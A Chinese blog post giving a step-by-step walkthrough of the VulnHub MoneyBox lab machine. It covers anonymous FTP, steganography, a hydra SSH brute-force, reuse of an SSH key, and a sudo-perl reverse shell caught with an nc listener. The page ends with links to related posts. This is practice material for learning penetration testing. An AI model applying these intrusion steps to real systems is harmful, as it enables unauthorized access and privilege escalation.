透测试靶机vulnhub——MoneyBox

最新推荐文章于 2024-10-09 21:15:29 发布
最新推荐文章于 2024-10-09 21:15:29 发布
阅读量77 收藏
点赞数
文章标签: linux 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70830611/article/details/133843999
版权

信息收集

  1. 主机探测:首先,我们需要确定靶机的IP地址

批注 2023-10-13 085632

  1. 靶机所有开放的端口对应服务版本号

  2. FTP匿名登录:发现21端口可以无验证登录,使用ftp进行匿名登录。

    批注 2023-10-13 085706

    登录成功后,发现有一个名为trytofind的图片,下载下来进行分析。

    1. 先用kali自带的strings工具查看一下该图片中的可打印字符。

    批注 2023-10-13 085739

  3. 虽然查到了图片中的文件,但是查看文件需要密码,ftp这条线索到此就断了。

    img

    1. 就去看看80端口好了,打开浏览器访问。

      80端口的网站主页也没什么有用的信息,查看网页源代码也没发现

      批注 2023-10-13 085831

      批注 2023-10-13 085839

  4. 进入80端口看一下,即使查看源码也没有任何提示。然后进行目录扫描,可以使用dirb进行目录扫描。

    批注 2023-10-13 085800

扫描结果显示/blogs/index.html下有内容。

批注 2023-10-13 085850

批注 2023-10-13 085940

  1. 隐藏目录访问:在源码中的最后一行,提示我们去访问另一个隐藏目录S3cr3t-T3xt。访问该目录后,找到了一个密钥3xtr4ctd4t4。

  2. 批注 2023-10-13 090036

    批注 2023-10-13 090028

找到密钥3xtr4ctd4t4,重新回到查看图片隐写处,输入密钥。

批注 2023-10-13 090428

cat查看图片中隐藏的data.txt,这是一封信件的格式,是告诉renu说他的密码太过于简单了,我们结合ssh端口。把用户名定位renu,用hydra爆破,这里爆破用的密码字典是kali自带的。

批注 2023-10-13 090625

批注 2023-10-13 091421

爆破得到密码:987654321,通过ssh连接。

批注 2023-10-13 091537

得到第一个flag。

历史命令里有把密钥发送给192.168.43.80的lily账号。

批注 2023-10-13 091708

又在/home/lily/发现了第二个flag

批注 2023-10-13 091802

前面猜测是生成的密钥发送给了本地的lily账户,如果是这样的话就能不用账号密码,用密钥就能够登录lily账户,为了验证这个猜想,执行ssh lily@127.0.0.1

批注 2023-10-13 093016

image-20231015160749533

执行sudo -l发现该用户存在sudo赋权,程序为/usr/bin/perl,perl同python类似,也是一门解释型语言,推测靶机应该有perl运行环境。

定位kali中的perl脚本反弹shell,将其拷贝到kali的/var/www/html下,重命名为p.php;

批注 2023-10-13 092626

修改p.php文件内容,将反弹连接的Ip地址改为kali的IP;

批注 2023-10-13 092348

开启kali的网站服务;

systemctl start apache2

切换到靶机lily会话,通过http协议下载p.php

lily wget

kali 通过nc命令监听1234端口

nc -lnvp 1234

靶机上通过sudo 运行p.php程序

image-20231015161343485

切换到渗透机kali,成功反弹管理员权限shell

批注 2023-10-13 093358

批注 2023-10-13 093411

渗透总结:

  • 信息收集获取ip地址 和端口信息
  • FTP匿名登入 隐写工具得使用steghide
  • hydra得使用暴力破解
  • 利用perl进行提权。
benben-xu
关注
看完这篇 教你玩转渗测试靶机vulnhub——BossplayersCTF
Aluxian_的博客
05-06 1319
Vulnhub靶机BOSSPLAYERSCTF1渗测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:命令执行漏洞:③:反弹shell:④:suid提权:⑤:获取flag:Vulnhub靶机总结: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗测试、提权、漏洞利用、代码审计等等有趣的实战。 这是新手CTF得靶机还是老样子找到flag.t
2024年最全看完这篇 教你玩转渗测试靶机vulnhub——FunBox1(1),2024年最新科学技术协会面试
2401_84562858的博客
05-08 1165
1.修改/etc/hosts文件 解析网站2.从新学习了一遍定时提权 (主要是回弹的命令)3.还有一些简单的扫码工具 和枚举工具 这靶机其实很简单 因为太久没做了 所以从新温习一下 主要是学习渗的思路!网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
看完这篇 教你玩转渗测试靶机vulnhub——MoneyBox: 1
Aluxian_的博客
01-13 1809
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。首先这个靶机比较简单 所以知识点也不多1.信息收集获取ip地址 和端口信息2.FTP匿名登入 隐写工具得使用steghide3.hydra得使用暴力破解4.利用perl进行提权。希望对刚入门得小白有帮助!
看完这篇 教你玩转渗测试靶机vulnhub——FunBox1
Aluxian_的博客
09-05 2479
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。1.修改/etc/hosts文件 解析网站2.从新学习了一遍定时提权 (主要是回弹的命令)3.还有一些简单的扫码工具 和枚举工具 这靶机其实很简单 因为太久没做了 所以从新温习一下 主要是学习渗的思路!
看完这篇 教你玩转渗测试靶机Vulnhub——Hms?1
Aluxian_的博客
11-27 511
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagEasy (简单的)1.信息收集工具得使用2.提权命令的使用3.FTP下载、hydra爆破、SSH登入 渗的流程思路🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
看完这篇 教你玩转渗测试靶机vulnhub——FunBox7( EASYENUM)_funbox7只扫描到53号端口
2401_84731999的博客
05-12 421
【代码】看完这篇 教你玩转渗测试靶机vulnhub——FunBox7( EASYENUM)_funbox7只扫描到53号端口。
看完这篇 教你玩转渗测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5718
Vulnhub靶机Web1渗测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
看完这篇 教你玩转渗测试靶机vulnhub——DC6
Aluxian_的博客
03-28 5423
Vulnhub靶机DC6渗测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解:③:漏洞发现:④:漏洞利用:⑤:提权:⑤:提权: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC6,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https
看完这篇 教你玩转渗测试靶机vulnhub——DC3
热门推荐
Aluxian_的博客
03-23 1万+
Vulnhub靶机DC3渗测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现:③:SQL注入:④:文件上传:⑤:提权: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载:
Vulnhub靶机:DC-3渗详细过程
IerkeU的博客
02-21 2528
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机实战——Matrix3
冠霖L的博客
11-15 932
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192.168.220.160 Kali的IP地址:192.168.220.155 Matrix3靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155 ip add...
Vulnhub靶机实战——Matrix2
冠霖L的博客
11-10 1229
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Matrix2靶机IP地址: 192.168.220.159 Kali的IP地址: 192.168.220.155 Matrix2靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.1...
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9124
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
Vulnhub靶机实战——DC-1
冠霖L的博客
09-27 1991
靶机DC-1下载地址:https://download.vulnhub.com/dc/DC-1.zip 描述:靶机DC-1共有5个flag,并且需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.130 Kali的IP地址:192.168.220.131 本...
[Linux]从零开始的网站搭建教程
c858845275的博客
10-02 1403
讲解了如何搭建运维面板安装web服务器和搭建一个自己的网站。
Linux】进程地址空间(初步了解)
weixin_69380220的博客
10-04 1460
进程虚拟地址空间相关内容
黑马linux笔记(转载)
pscool的博客
10-01 2098
我们所熟知的计算机是由硬件和软件组成的。计算机系统中由电子、机械和光电元件等组成的各种物理装置的总称。(看的见、摸得着的东西:CPU、内存硬盘、显示屏、鼠标等)是用户和计算机硬件之间的接口和桥梁,用户通过软件和计算机进行交流。(操作系统,就是软件的一类)学习Linux系统,就需要有一个可用的Linux系统。由于Linux系统并不适合日常办公使用,所以我们需要借助虚拟机来获得可用的Linux系统环境进行学习。借助虚拟化技术,我们可以在系统中,通过软件:模拟计算机硬件,并给虚拟硬件安装真实的操作系统。
Linux和数据库)1.Linux操作系统和常用命令
最新发布
2301_79144798的博客
10-09 361
除了办公和玩游戏之外不用Linux,其他地方都要使用Linux(it相关)iOS的本质是unix(unix是付费版本的操作系统)unix和Linux之间很相似命令 选项 参数由这三部分组成 可以只有命令目录就是文件夹。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值